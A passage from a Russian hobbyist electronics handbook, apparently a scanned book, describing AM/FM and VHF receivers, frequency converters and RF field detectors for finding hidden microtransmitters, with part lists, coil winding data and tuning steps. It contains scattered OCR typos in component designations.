Предлагаемое радиоприемное устройство по схемному решению намного проще рассмотренного выше. Это стало возможным благодаря использованию в приемнике специализированной микросхемы К174ХА10. Она включает в себя тракт ПЧ, детектор, УЗЧ. Чувствительность приемника при отношении сигнал/шум 12 дБ - около 1 мкВ/м. Селективность по соседнему каналу - 32 дБ (целиком зависит от параметров используемого пьезокерамического фильтра). Селективность по зеркальному каналу - 26 дБ. Мощность усилителя звуковой частоты -100 мВт на нагрузке сопротивлением 8 Ом. Приемник работает при питающих напряжениях от 4 до 9В. Принципиальная схема приведена на рис. 2.49.
Сигнал с антенны поступает на базу транзистора VT1, который выполняет роль резонансного усилителя высокой частоты. Контур L1, С3 определяет селективность приемника по зеркальному каналу. Усиленный сигнал поступает на вход преобразователя частоты, выполненного на транзисторе VT2 по схеме с совмещенным гетеродином, частота которого стабилизирована кварцем ZQ1. С нагрузки преобразователя, дросселя Др1, сигнал промежуточной частоты поступает на пьезокерамическпй фильтр ZQ2, который из набора частот выделяет промежуточную частоту 465 кГц.
Отфильтрованная ПЧ поступает на вход УПЧ микросхемы DA1. Выходной каскад УПЧ включен по нестандартной схеме, роль нагрузки УПЧ выполняет резистор R8. Это немного ухудшает качество детектировання, но позволяет отказаться от использования контуров ПЧ и их настройки. С выхода детектора напряжение звуковой частоты поступает на регулятор громкости R10 и с него на вход усилителя мощности данной микросхемы. С выхода УЗЧ сигнал через конденсатор С13 поступает в нагрузку - громкоговоритель или головные телефоны.
Транзисторы VT1, VT2 можно заменить на КТЗ42, КТЗ68. Все сопротивления в схеме типа МЛТ-0,125, резистор R10 - типа СП1. Катушка L1 намотана на ферритовом стержне диаметром 2,8 мм и длиной 14 мм и содержит 16 витков провода ПЭВ 0,23 мм с отводом от 11-го витка, считая снизу по схеме. Дроссель Др1 намотан на аналогичном стержне и содержит 150 витков провода ПЭВ 0,1 мм. Настройку начинают с установки коллекторных токов транзисторов VT1 и VT2 равными 0,7 мА и 2 мА, соответственно, путем подбора сопротивлений резисторов R1 и R3. Резистор R8 подбирают по минимуму искажений звукового сигнала при минимальном уровне шумов на выходе УЗЧ. Контур L1, СЗ настраивается на частоту высокочастотного сигнала.
Модернизировать данный приемник можно, применив еще одну специализированную микросхему - DА2 К174ПС1. Она выполняет функции смесителя и гетеродина и имеет больший коэффициент передачи. Высокочастотная часть схемы (рис. 2.49) заменяется на схему, представленную на рис. 2.50.
Обозначение деталей схемы продолжает рис. 2.49. Катушка L1 выполнена без отвода. Транзистор VT3 выполняет роль симметрирующего устройства.
2.4.2. Радиоприемные устройства ЧМ сигналов высокой чувствительности
Радиоприемное устройство предназначено для приема сигнала в диапазоне 27-29 МГц с использованием узкополосной частотной модуляции с девиацией частоты 2,5 KГц. Чувствительность такого приемника около 1 мкВ. Напряжение питания - 4-9 В. Избирательность по соседнему и зеркальному каналам не хуже 40 дБ и 23 дБ, соответственно. Принципиальная схема приемника приведена на рис. 2.51.
Приемник выполнен по супергетеродинной схеме на интегральной микросхеме К174ХА26, которая предназначена для работы в тракте ПЧ приемников с двойным преобразованием частоты. Для упрощения схемы в нашем случае используется только одно преобразование частоты.
Сигнал от антенны поступает на входной контур L1, С3, настроенный на частоту входного сигнала. Диоды VD1, VD2 служат для ограничения входного сигнала большой амплитуды, например, импульсных помех. Контур L1, С3 полностью подключен к затвору транзистора VT1 типа КПЗ50А. Этот транзистор выполняет роль резоансного усилителя высокой частоты. В его стоковую цепь включен контур L2, С4, также настроенный на частоту принимаемого сигнала. С катушки связи L3 усиленный сигнал поступает на вход смесителя - микросхему DA1. На второй затвор транзистора VT1 поступает напряжение, снимаемое с движка подстроечного резистора R1. Изменением напряжения на втором затворе транзистора изменяют коэффициент усиления резонансного усилителя на транзисторе VT1 и, как следствие, повышают чувствительность всего приемника в целом. Гетеродин приемника выполнен на элементах, входящих в состав микросхемы DA1, его частота определяется подключенным к выводу 1 кварцевым резонатором.
Частота кварцевого резонатора должна отличаться от частоты входного сигнала на 465 кГц (в меньшую или большую сторону). С выхода смесителя сигнал ПЧ через буферный каскад поступает на пьезокерамический фильтр ZQ2, который определяет селективность по соседнему каналу. С выхода фильтра ZQ2 сигнал поступает на усилитель-ограничитель ПЧ и частотный детектор, входящие в состав микросхемы DA1. Пятикаскадный УПЧ имеет коэффициент усиления по напряжению около 100. Дeтeктоp выполнен по схеме двойного балансного перемножителя. Для нормальной работы детектора необходим фазосдвигающий контур L4, С21. Резистор R14 шунтирует контур, расширяя тем самым его полосу пропускания. От него зависит чувствительность и уровень шумов на выходе устройства. Резистор R14 подбирается по оптимальному значению приведенных показателей. Продетектированный сигнал усиливается предварительным УЗЧ, который также находится в микросхеме DA1 , и поступает на регулятор громкости, выполненный на резисторе К12, а с движка этого переменного резистора - на вход УЗЧ, выполненного на микросхеме DA2 типа К174ХА10.
Приемник имеет систему бесшумной настройки, которая работает следующим образом. При отсутствии входного сигнала или значительном снижении его уровня на выводе 10 микросхемы ПА1 резко увеличивается уровень шумов, которые имеют максимальную спектральную плотность в диапазоне 7-10 кГц. Этот шум поступает на активный фильтр, собранный на операционном усилителе, входящем в состав микросхемы DA1. Усиленный сигнал шумов поступает на детектор, собранный на диоде VD3, где и преобразуется в уровень постоянного напряжения. Это напряжение поступает на вход триггера, входящего в состав микросхемы DA1, на выходе которого (вывод 16) , при отсутствии полезного сигнала, устанавливается нулевой уровень. Этот уровень шунтирует. регулятор громкости R13 и блокирует вход УЗЧ. Порог срабатывания системы бесшумной настройки устанавливается резистором R4.
В приемнике вместо микросхемы DA1 типа К174ХА26 можно использовать микросхему КФ1066ХА2. Эта микросхема по своему составу аналогична К174ХА26, но отличается расположением выводов.
Вместо микросхемы DА2 можно использовать К174УН14, К174УН7 или выполнить УЗЧ на дискретных элементах. Транзистор КП350 можно заменить на КПЗО6. Пьезокерамнческий фильтр ZQ2 - любой малогабаритный фильтр на 465 кГц. Катушки L1, L2, L3 намотаны на цилиндрических каркасах диаметром 5 мм с подстроечными сердечника из феррита марки 100НН, длиной 12 мм и диаметром 2,8 мм. Катушка L1 содержит 9 витков с отводом от третьего витка, L2 9 витков, L3 - 3 витка провода ПЭВ 0,3 мм. Катушка L3 наматывается поверх катушки L2. Катушка L4 наматывается на каркасе от контура ПЧ радиовещательного приемника и содержит 90 витков провода ПЭВ 0.12 мм.
Настройку приемника выполняют традиционным способом. Резистором R1 устанавливается максимальная чувствительность, а резистором R4 - порог срабатывания бесшумной настройки
Приемник УКВ диапазона с ЧМ
Приемник предназначен для приема станций, работающих в диапазоне 64-108 МГц с частотной модуляцией. Чувствительность приемника при соотношении сигнал/шум ЗОдБ - не хуже 70 мкВ/м. Избирательность по соседнему каналу - 18 дБ. Питается приемник от источника питания напряжением 9 В. Принципиальная схема приемника представлена на рис.2.52.
Сигнал с антенны через конденсатор С2 поступает на входной контур L1, С1, настроенный на середину диапазона. В процессе настройки на станцию этот контур не перестраивается. Выделенная этим контуром полоса частот поступает на преобразователь частот, выполненный на микросхеме DA1 типа К174ПС1. На этой же микросхеме выполнен и гетеродин приемника. Частота гетеродина определяется параметрами контура L2, С6, С8, С9, С10, VD1, С11. При настройке на станцию постоянное напряжение, снимаемое с движка надстроечного резистора R5, воздействует на катод варикапа VD1 и изменяет его емкость и, следовательно, частоту гетеродина.
Напряжение АПЧГ поступает с микросхемы DA2 на анод этого варикапа.
Напряжение ПЧ частотой 6,5 МГц выделяется на нагрузке преобразователя частоты резисторе R1 и через пьезокерамический фильтр ZQ1 поступает на вход микросхемы DA2 типа К174УР3. Последняя содержит УПЧ, усилитель-ограничитель, фазоинвертор и частотный детектор, предварительный УЗЧ с электронной регулировкой громкости.
В фазоинверторе детектора работает колебательный контур L3, С21 . На резисторе R7 выделяется напряжение АПЧГ, которое поступает на варикап VD1 через цепь R16, С16, R6. С детектора сигнал поступает на вход предварительного УЗЧ. Регулировка громкости осуществляется изменением сопротивления резистора R10. С выходаэтого усилителя сигнал НЧ поступает на усилитель мощности, выполненный на операционном усилителе - микросхеме DАЗ типа КР1407УД2 и двух транзисторах VT1, VT2, включенных по схеме эмиттерных повторителей.
Катушки приемника L1 и L2 бескаркасные, наматываются на оправке диаметром 3 мм. Катушка L1 содержит 7 витков с отводом от 1 витка, катушка L2 - 7 витков провода ПЭВ 0,4 мм. Катушка L3 намаывается на ферритовом сердечнике марки 400НН диаметром 2,8 мм и длиной 14 мм. Катушка L3 содержит 16 витков ПЭВ 0,3 мм, она должна с небольшим трением перемещаться по стержню. После настройки все катушки фиксируются эпоксидной смолой или герметиком. Фильтр ZQ1 - типа ФП1П86202 или любой другой на 6,5 МГц. Можно использовать и фильтры на 5,5 МГц или 10,7 МГц, но в этом случае необходимо будет изменить параметры контура L3, С21. Резистор R5 лучше взять подстроечный многооборотный. Микросхему DА3 можно заменить на КР140УД1208 или любой операционный усилитель, включенный по типовой схеме.
Настройка приемника особенностей не имеет.
При желании принимать сигнал от нескольких радиомикрофонов, разнесенных по частоте, необходимо немного доработать приемник, путем введения нескольких фиксированных настроек. Примерный вариант схемы фиксированных настроек показан на рис. 2.53.
Из схемы можно исключить конденсаторы С4, С5, заменив их катушкой связи L4 (рис. 2.54), намотанной между витками катушки L1.
Катушка L4 содержит 2 витка того же провода, что и катушка L1.
Схему приемника можно несколько упростить, использовав гибридную микросхему от канала звукового сопровождения современных цветных телевизоров типа УПЧЗ-1M или УПЧЗ-2. В составе этих блоков есть полный тракт ПЧ УКВ ЧМ приемника с промежуточной частотой 6,5 МГц. Изменение схемы представлено на рис. 2.55
Однако следует иметь в виду, что эта схема не имеет системы АПЧГ. Поэтому нужно принимать меры по экранировке платы, чтобы исключить влияние тела оператора на настройку приемника.
Приемник УКВ диапазона с ЧМ и низковольтным питанием
Приемник работает в диапазоне 64-108 МГц и имеет чувствительность не хуже 5 мкВ/м. Номинальное напряжение питания - 3 В. Весь высокочастотный тракт, включая ЧМ детектор, УВЧ и гетеродин, собран на одной специализированной микросхеме DA1 типа К174ХА34. Эта микросхема представляет собой УВЧ, смеситель, гетеродин, УПЧ, усилитель-ограничитель, ЧМ детектор, системы шумепонижения и сжатия девиации частоты, которая позволяет использовать низкую промежуточную частоту - 60-80 кГц. Принципиальная схема приемника приведена на рис. 2.56.
Сигнал с антенны поступает на УВЧ через конденсатор С1. Частоту настройки гетеродина определают элементы L1, С4, С5, VD1. Настройка на станции осуществляется резистором R1, изменяющим напряжение на варикапе VD1 типа КВ109.
В качестве ФПЧ используются активные RC-фильтры на операционных усилителях, внешними элементами которых являются конденсаторы С6, С8, С9, C11, С12 и С13. Сигнал звуковой частоты через конденсатор С16 поступает на регулятор громкости - резистор RЗ.
УЗЧ приемника может быть любым, в том числе и на микросхеме К174ХА10. Постоянные резисторы типа МЛТ-0,125. Катушка L1 - бескаркасная с внутренним диаметром 3 мм. Она имеет 7 витков провода ПЭВ 0,31.
Настройка заключается в укладке диапазона подстройкой конденсатора С4.
УКВ приемник с ЧМ на специализированной микросборке КХА 058
Этот приемник прост в настройке и в изготовлении, и может быть рекомендован для повторения широкому кругу читателей. Основу приемника составляет микросборка КХА058, которая содержит в своем составе гетеродин, смеситель, УПЧ, детектор. Приемник имеет чувствительность с антенного входа около 5 мкВ/м при соотношении сигнал/шум 26 дБ. Принципиальная схема приемника представлена на рис. 2.57.
Сигнал с антенны поступает на вход апериодического усилителя высокой частоты, выполненного на транзисторе VT1 тина КТ3107. Усиленный сигнал через конденсатор С3 поступает на вход микросборки DA1. В ней происходит усиление и демодуляция ЧМ сигнала принимаемой радиостанции. Частота гетеродина-определяется параметрами контура L1, VD1 и конденсатора, находящегося в микросборке. Перестройка в пределах диапазона производится изменением напряжения на варцкапе VD1, которое снимается с движка резистора R7. Напряжение на резистор R7 подается от внутреннего стабилизатора микросборки.
Выходное напряжение НЧ с выхода микросборки поступает на вход эмиттерного повторителя на транзисторе VT2 типа КТ315. С него сигнал подается на головные телефоны В2 или на вход УЗЧ с чувствительностью не хуже 50 мВ.
Транзистор VT1 можно заменить на КТ3128, КТЗ61. Транзистор VT2 - на КТ3102. Вместо варикапа VD1 можно использовать КВ109, КВ122, КВ123. Катушка L1 бескаркасная, намотана на оправке диаметром 3,5 мм. Катушка L1 содержит 7 витков провода ПЭВ 0,4 мм для диапазона 68-80 МГц или 3 витка - для диапазона 80-108 МГц.
Если предполагается использовать приемник для работы с одним радиомикрофоном, то можно применить фиксированную настройку. При этом можно исключить из схемы элементы VD1, R7, R8, а параллельно катушке L1 включить подстроечный конденсатор емкостью 430 пФ, который позволит перекрыть весь необходимый диапазон.
2.4.3. Конвертеры для работы с радиоприемниками вещательных диапазонов
Как правило, у потребителя уже имеется приемник на радиовещательные диапазоны, и ему нет необходимости собирать и настраивать приемное устройство для работы с радиопередатчиками. Достаточно иметь приставку-конвертер, работающую с обычным приемником. Конвертеры несколько снижают чувствительность приемника, но в ряде случаев это не мешает получать качественный прием необходимого сигнала. Ниже приводятся схемы и описания конвертеров на транзисторах и микросхемах. Устройства рассчитаны для работы и определенных диапазонах частот. Однако все описанные устройства можно использовать и на других частотах. Для этого, как правило, нужно только изменить частоту гетеродина конвертера. Конструктивно они могут быть выполнены в отдельном корпусе и с автономным источником питания. Но можно и встраивать их непосредственно в корпус используемого приемника.
УКВ конвертер на двух полевых транзисторах
Принципиальная схема конвертера представлена на рис. 2.58.
Он тозволяет принимать сигналы с частотной модуляцией при помощи обычного УКВ ЧМ приемника. Входной сигнал с частотой 58-78 МГц выделяется входным контуром L1, С1, настроенным на середину этого диапазона, и поступает далее на затвор полевого транзистора VT1 типа КП303Г. На этом транзисторе выполнен преобразователь частоты. На исток транзистора VT1 через конденсатор С4 подается сигнал гетеродина, выполненного на полевом транзисторе VT2 типа КП303Г. Контур гетеродина L2, С6 настроен на частоту 30 МГц. В результате входгай сигнал преобразуется в сигнал частотой 88-108 МГц. Этот сигнал снимается со стока транзистора VT1 и через конденсатор С3 поступает на антенный вход промышленного приемника.
Транзисторы могут быть с другими буквенными индексами. Резисторы типа МЛ-0,125, конденсаторы - КМ, КД, КЛС, катушки L1, L2 намотаны на каркасах диаметром 4 мм и длиной 10мм с латунными подстроечными сердечниками длиной 5 мм. Катушка L1 содержит 5 витков с отводом от 1 витка, катушка L2 - 10 витков с отводом от 2 витка. Обе катушки намотаны проводом ПЭВ-2 0,4 мм.
Настройка конвертера заключается в настройке контура гетеродина на частоту 29-31 МГц. Входной контур настраивается на середину принимаемого диапазона. Конвертер можно использовать и для приема сигналов в диапазоне 88-108МГц на УКВ ЧМ радиовещательный приемник. Для этого нужно уменьшить емкость конденсатора С1 до 15 пФ.
УКВ конвертер на одном полевом транзисторе
Конвертер представляет собой модернизированный вариант предыдущей схемы. В данной схеме преобразователь частоты на полевом транзисторе заменен диодным смесителем. Это сделано с целью согласования низкого входного сопротивления приемника с выходным сопротивлением преобразователя на транзисторе. Диодный смеситель в этом случае имеет более высокий коэффициент передачи, а следовательно, увеличивается и чувствительность конвертера в целом. Принципиальная схема конвертера приведена на рис. 2.59.
Гетеродин конвертера выполнен на транзисторе VT1, его частота задается параметрами катушки L1 и конденсатора С1. Сигнал гетероина частотой около 30 МГц поступает на анод германиевого диода VD1 . На катод этого диода поступает принятый антенной сигнал. Одновременно на катоде диода присутствуют и сигналы продуктов преобразования-частот: Fс + Fп и Fс - Fп, которые выделяются входными цепями используемого приемника. Конвертер может работать без дополнительной настройки с приемником диапазона УКВ1 или УКВ2.
В качестве диода VD1 можно использовать практически любой маломощный диод, например, Д18, ГД507 и т. д. В качестве катушки L2 использован дроссель ДМ-0,1 с индуктивностью 10 мкГн. Катушка L1 намотана на каркасе диаметром 5 мм и длиной 10 мм, и содержит 10 витков провода ПЭВ-2 0,4 мм с отводом от 2 витка. Подстроечный сердечник - из меди или латуни длиной 5 мм.
Настройка производится аналогично рассмотренной выше схеме.
УКВ конвертер на специализированной микросхеме
Отсутствие элементов настройки существенно упрощает конструкцию преобразователя, так как настройка производятся самим прием ником. В конвертере используется микросхема К174ПС1, которая и же хорошую развязку между сигналом гетеродина и входным сигналом Следовательно, даже мощные входные сигналы незначительно расстра ивают гетеродин. Микросхема некритична к питающему напряжению, так как содержит встроенный стабилизатор напряжения. Принципиальная схема конвертера приведена на рис. 2.60.
Частоту гетеродина определяют параметры контура L1, С4. Входной сигнал поступает через конденсатор С1 на вход преобразователя частоты. На нагрузке преобразователя резисторе RЗ выделяются суммарная и разностная составляющие сигнала. Частота гетеродина задается равной 40 МГц. При использовании приемника с диапазоном 88-108 МГц используется разностная частота, а суммарная - отфильтровывается входными цепями приемника. В нашем случае с помощью конвертера перекрывается диапазон входных сигналов от 128 МГц до 148 МГц. При необходимости можно перекрывать и другие диапазоны путем изменения частоты гетеродина. Микросхема DA1 работоспособна до частоты 200 МГц.
Катушка L1 намотана на надстроечном сердечнике от магнитопровода CБ-1a и содержит 5 витков провода ПЭВ 0,3 мм, намотанных виток к витку. Микросхему DA1 можно заменить на К174ПС4 или ее аналог SO42P.
Настройка конвертера сводится к установке частоты гетеродина из менением индуктивности катушки L1.
Миниатюрный конвертер на частоту 430 МГц
Данный конвертер во многом похож на предыдущий. Отличие со стоит в том, что в нем применена микросхема К174ПС4, позволяющая принимать сигнал с частотой до 1 ГГц. Принципиальная схема устройства приведена на рис. 2.61.
Входной сигнал с антенны поступает на катушку L1. С катушки сигнал снимается одновременно на оба входа микросхемы. Частота гетеродина устанавливается элементами С1, С2, С3, L2. Нагрузкой преобразователя служит колебательный контур L3, С4, настроенный на частоту в диапазоне 88-108 МГц. Через конденсатор С5 преобразованный сигнал поступает на вход приемника. Конвертер имеет высокую чувствительность и малые габариты. Катушка L1 сделана из провода ПЭВ 0,8 мм длиной 30 мм. Ее конструкция и расположение приведены на рис. 2.62.
Катушка L2 бескаркасная с внутренним диаметром 2 мм, намотана проводом ПЭВ 0,23 и содержит 6 витков. Катушка L3 намотана на корпусе надстроечного конденсатора С4 проводом ПЭВ 0,23 и содержит 10 витков с отводом от середины. Катушка L1 может быть выполнена печатным способом.
Глава 3. Технические средства защиты информации
Вудь вы предпринимателем-бизнесменом, работником государственного сектора, политиком или просто частным лицом, вам должно быть интересно знать, как защитить ceбя от утечки конфиденциальной информации, какими средствами для этого нужно пользоваться, как выявить каналы утечки этой информации. Ответ на эти и другие вопросы по защите информации вы получите в данной главе, которая имеет четыре раздела.
В первом разделе даны описания, принципы работы и настройка детекторов радиоизлучений, с помощью которых можно обнаруживать активизированные каналы утечки информации.
Второй раздел посвящен защите телефонных линий связи и непосредственно телефонных аппаратов. Телефон - неотъемлемая часть нашей жизни, по телефонным каналам идут потоки разнообразной информации, и именно поэтому важно защищать их от использования вам во вред.
Третий раздел посвящен специальным защитным устройствам, снижающим эффективность систем получения информации по оптическим каналам.
Четвертый раздел посвящен описанию устройств , также имеющих отношение к защите информации. Это сетевые фильтры для защиты от наводок и генераторы акустического шума для контроля акустических свойств помещений.
Для разработки и осуществления мероприятий по защите вашей интеллектуальной собственности от утечки информации по техническим каналам лучше всего воспользоваться услугами квалифицированных специалистов, хорошо подготовленных в рамках данного вопроса.
3.1. Детекторы радиоизлучений
Простейший детектор радиоволн
Даже если вам нечего опасаться, но вы хотели бы выяснить, не шпионит ли кто-нибудь за вами с помощью подслушивающей радиоаппаратуры, соберите схему, показанную на рис. 3.1.
Устройство представляет собой простейший детектор радиоволн со звуковой индикацией. С его помощью можно отыскать в помещении работающий микропередатчик. Детектор радиоволн чувствителен к частотам вплоть до 500 МГц. Настраивать детектор при поиске работающих передатчиков можно путем изменения длины телескопической приемной антенны.
Телескопическая приемная антенна воспринимает высокочастотные электромагнитные колебания в диапазоне до 500 МГц, которые затем детектируются диодом VD1 типа Д9Б. Высокочастотная составляющая сигнала отфильтровывается дросселем L1 и конденсатором С1. Низкочастотный сигнал поступает через резистор R1 на базу транзистора VT1 типа КТ315, что приводит к открыванию последнего и, как следствие, к открыванию транзистора VT2 типа КТ361. При этом на резисторе R4 появляется положительное напряжение, близкое к напряжению питания, которое воспринимается логическим элементом DD1.1 микросхемы DD1 типа К561ЛА7 как уровень логической единицы. При этом включается генератор импульсов на элементах DD1.1, DD1.2, R5 и С3. С его выхода импульсы с частотой 2 кГц поступают на вход буферного каскада на элементах DD1.3, DD1.4. Нагрузкой этого каскада служит звуковой пьезокерамический преобразователь ZQ1 типа ЗП-1, который преобразует электрические колебания частотой 2 кГц в акустические. С целью увеличения громкости звучания преобразователь ZQ1 включен между входом и выходом элемента DD1.4 микросхемы DD1. Питается детектор от источника тока напряжением 9 В через параметрический стабилизатор на элементах VD2, R6.
В детекторе используются резисторы типа МЛТ-0,125. Диод VD1 можно заменить на ГД507 или любой германиевый высокочастотный. Транзисторы VT1 и VT2 могут быть заменены на КТ3102 и КТ3107 соответственно. Стабилитрон VD2 может быть любым с напряжением стабилизации 4,7-7,0 В. Пьезокерамический преобразователь ZQ1 можно заменить на ЗП-22.
Настраивать детектор лучше всего с использованием высокочастотного генератора. Подключите к выходу генератора изолированный провод - антенну, и параллельно ему расположите антенну детектора. Таким образом вы слабо свяжете детектор с генератором. Исследуйте весь радиодиапазон, начиная с частоты 500 кГц и до точки, где детектор перестанет воспринимать радиоволны. Заметьте, как с изменением частоты изменяется чувствительность детектора.
Детектор поля со звуковой сигнализацией и регулировкой чувствительности
От предыдущего данное устройство отличается более высокой чупствительностью н возможностью регулировки чувствительности. Это устройство одновременно и сложнее вышеописанного. Принципнальная схема детектора приведена на рис. 3.2.
Сигнал, принимаемый антенной, усиливается широкополосным трехкаскадным апериодическим усилителем высокой частоты на транзисторах VT1-VT3 типа КТ3101. Усиленный сигнал с нагрузки транзистора VT3, резистора R10, через конденсатор С9 поступает на детектор, собранный по схеме удвоения напряжения на диодах VD1, VD2. Положительное напряжение с регулятора чувствительности резистора R11 поступает на диоды VD1 и VD2 типа Д9Б. Протекание небольшого начального тока через эти диоды приводит к увеличению чувствительности детектора. Одновременно это напряжение поступает на базу транзистора VT4 типа КТ315 через диод VD3 типа Д9Б и резистор R14. Базовый ток приводит к открыванию транзистора VT4. На его коллекторе устанавливается потенциал логической единицы. При увеличении уровня сигнала на входе устройства постоянное напряжение на конденсаторе С10 уменьшается. Это ведет к закрыванию транзистора VT4. Уровень логической единицы, появляющийся на коллекторе транзистора VT4, разрешает работу генератора прямоугольных импульсов на элементах DD1.1, DD1.2, R17 и C11. Положительные импульсы частотой около 2 Гц разрешают работу генератора прямоугольных импульсов на элементах DD1.3, DD1.4, R18 и С12. С выхода этого генератора прямоугольные импульсы с частотой следования 1,5-2 кГц, промодулированные частотой 2 Гц, поступают на пьзокерамичсский преобразователь ZQ1 типа ЗП-1. Питание устройства ocуществляется от параметрического стабилизатора на стабилитроне VD4 типа КС156 и резисторе R16.
В устройстве использованы резисторы типа МЛТ-0,125. Транзисторы VT1-VT3 можно заменить на КТ3120, КТ3124 или КТ368. В последнем случае уменьшается диапазон регистрируемых сигналов. Диоды VD1-VD3 могут быть любые германиевые высокочастотные. Стабилитрон VD4 может быть любым с напряжением стабилизации 5,6-7,0 В.
Настройку детектора производят по вышеприведенной методике. Верхний предел частоты регистрируемых сигналов у этого детектора может достигать 900-1000 МГц. Регулировка прибора заключается в установлении такого уровня чувствительности детектора резистором R11, при котором компенсируется фоновый уровень радиоизлучения в данном помещении. При этом звуковой сигнализатор не должен работать. При приближении детектора к источнику излучения (микропередатчику) уровень напряженности поля начинает превышать фоновый и звуковая сигнализация срабатывает.
Постой малогабаритный детектор поля с индикацией на двух светодиодах.
От описанных выше конструкций данная отличается малыми габаритами, малым количеством используемых деталой и, вместе с тем, достаточно высокой чувствительностью. В этом детекторе поля использовано новое схемное решение. Хорошо известно, что измерение ВЧ напряжений, меньших 0,5 В, затруднено тем, что уже при переменном напряжении менее 0,2-0,3 В все полупроводниковые диоды становятся неэффективными. Существует, однако, способ измерения малыхпеременных напряжений с использованием сбалансированного диодно-резистивного моста, позволяющий измерять напряжение менее 20 мВ при равномерной АХЧ до 900 МГц. Принципиальная схема устройства, использующего данный способ, приведена на рис. 3.3.
Основу данного устройства составляет микросхема DА1 типа КР1112ПП2. Эта микросхема включает в себя устройство, определения баланса электрического моста с индикацией. Микросхема имеет встроенный источник опорного напряжения.
Сигнал, наводимый в антенне, усиливается широкополосным апериодическим усилителем высокой частоты на транзисторе VT1 типа KT3101. Усиленное переменное напряжение высокой частоты через конденсатор СЗ поступает в диодно-резистивный мост на диодах VD1- VD4 типа ГД507 и резисторах R3-R5. От источника опорного напряжения (вывод 3 микросхемы DA1) через резисторы R3-R5 и диоды VD1-VD4 протекает небольшой (примерно несколько микроампер) прямой ток, который улучшает условия детектирования и увеличивает чувствительность детектора. В выпрямлении измеряемого переменного напряжения участвуют только диоды VD1 и VD2, а два других - VD3, VD4 - образуют соседнее плечо моста, на котором создается начальное напряжение, балансирующее мост, и одновременно служат для его термокомпенсации. Все диоды подобраны с возможно более близкими вольт-амперными характеристиками. Конденсатор С4 отфильтровывает переменную составляющую выпрямленного напряжения. Резистор R4 служит для точной балансировки моста. При хорошей балансировке устройство будет реагировать только на напряжение, являющееся результатом выпрямления измеряемого сигнала. Выпрямленное напряжение и напряжение, балансирующее мост, через резисторы R7 и R8 поступают на входы усилителя постоянного тока, расположенного в микросхеме DA1. В зависимости от состояния баланса моста сигнал индикации поступает на один из светодиодов VD5 или VD6 - типа АЛЗО7. Таким образом, при балансе моста (отсутствие сигнала) включен светодиод VD5, а при наличии сигнала (нарушение баланса моста) - светодиод VD6.
В качестве диодов VD1-VD4 можно использовать любые высокочастотные диоды. Светодиоды могут быть любого типа. В качестве источника питания используется источник постоянного тока напряжением 2,5-5 В.
Детектор поля с линейной шкалой из восьми светодиодов, регулировкой чувствительности и звуковой индикацией
Данное устройство имеет некоторое сходство с описанным выше. Так, имеется усилитель ВЧ и детектор на сбалансированном резистивно-диодном мосте. Отличительной особенностью данного детектора поля является: фильтр высокой частоты на входе, усилитель постоянного тока на двух операционных усилителях, звуковой генератор, линейная светодиодная шкала и индикатор разряда батареи. Все это делает данное устройство несомненно более простым и удобным в эксплуатации. Принципиальная схема детектора поля приведена на рис. 3.4.
Сигнал, принимаемый антенной, поступает на фильтр высокой частоты на элементах С2, L1, С3, L2, необходимый для подавления сигналов частотой менее 20 МГц. Это необходимо для уменьшения уровня низкочастотных сигналов, обычно составляющих фоновое радиоиз.чучение. С ФВЧ сигналы частотой более 20 МГц поступают на вход апериодического широкополосного усилителя высокой частоты, собранного на транзисторе VT1 типа КТ3101. С нагрузки усилителя pезистора R2 - напряжение высокой частоты через конденсатор С5 поступает на диоды VD1, VD2 типа ГД507, входящие в состав резистивно-диодного моста. Для балансировки моста используется резистор R4. Работа моста уже была подробно описана выше.
Продетектированное низкочастотное напряжение, сглаженное конденсатором С6, поступает на усилитель постоянного тока, выполненный на двух операционных усилителях DA1.1 и DA1.2, входящих в состав микросхемы К1401УД1. С выхода элемента DA1.1 постоянное напряжение поступает на генератор звуковой частоты, выполненный на операционном усилителе DA1.3. Частота генератора зависит от уровня постоянного напряжения на неинвертирующем входе элемента DА1.3, которое, в свою очередь, зависит от уровня входного сигнала. Таким образом, чем больше уровень входного сигнала, тем выше частота генератора звуковой частоты. С выхода генератора звуковой сигнал поступает на базу транзистора VT4 типа, КТ315, в коллекторную цепь которого включен пьезокерамический преобразователь ZQ1 типа ЗП-1.
Микросхемы DA2 и DA3 типа К1401УД1 составляют основу линейной шкалы. Операционные усилители, входящие в состав этих микросхем, включены по схеме компараторов напряжения. На неинвертирующие входы этих компараторов поступает опорное напряжение с линейки резисторов R14-R21. Другие входы компараторов соединены вместе, на них поступает постоянное напряжение с выхода усилителя постоянного тока DA1.2. При изменении этого напряжения от 0 до максимального значения происходит переключение компараторов, на выходе которых включены светодиоды VD5-VD14, образующие линейную светоизлучающую шкалу. Чем выше уровень сигнала на входе, тем больше светодиодов включено. Для уменьшения потребляемого светодиодной шкалой тока используется принцип динамической индикации. Для этого на базу транзистора VT2 типа КТ315 поступают импульсы с генератора звуковой частоты DA1.3, вызывая поочередное закрывание и открывание транзистора VT2. При закрывании транзистора VT2 положительное напряжение источника питания через резистор R32 поступает на катоды светодиодов VD5-VD14, что приводит к запиранию последних. Ток через светодиоды не течет и они гаснут. При открывании транзистора VT2 катоды светодиодов замыкаются на минус источника питания, и те светодиоды, на аноде которых присутствует положительное напряжение, загораются. Благодаря инерционным-свойствам человеческого глаза мигание светодиодов становится незаметным. Индикатор разряда батареи выполнен на элементе DА1.4 и светодиодах VD13, VD14. При снижении напряжения источника питания уменьшается ток, протекающий через стабилитрон VD15 и светодиод VD13 и, соответственно, напряжение на аноде VD13. Это вызывает включение светодиода VD14. Уровень срабатывания устанавливается подстроечным резистором R33 при настройке. Все устpoйство питается от стабилизатора, собранного на элементах VT3, VD15, VD13, R34, С8.
В устройстве использованы резисторы типа МЛТ-0,125. Светодиоды VD5-VD14 могут быть любыми. Диоды VD1-VD4 - любые высокочастотные германиевые. Катушки L1 и L2 бескаркасные, диаметром 8 мм, намотанные проводом ПЭВ 0,6 мм. Катушка L1 - 8 витков, катушка L2 - 6 витков. Резистор R4 - любой переменный резистор с линейной характеристикой. Транзисторы VT2-VT4 могут быть типа КТ3102. Стабилитрон VD15 можно заменить на КС147, КС168, КС170. Пьезокерамический преобразователь ZQ1 - любой. Можно также использовать динамическую головку сопротивлением более 50 Ом, резистор RЗ6 при этом можно из схемы исключить.
Настройка схемы особенностей не имеет. Перед началом работы необходимо настроить детектор на максимальную чувствительность резистором R4. Вращением движка резистора R4 добиваются свечения 1-2 светодиодов и выключения звуковой сигнализации. Прибор готов к работе.
Детектор поля с логарифмической шкалой на 12 светодиодах и звуковой индикацией
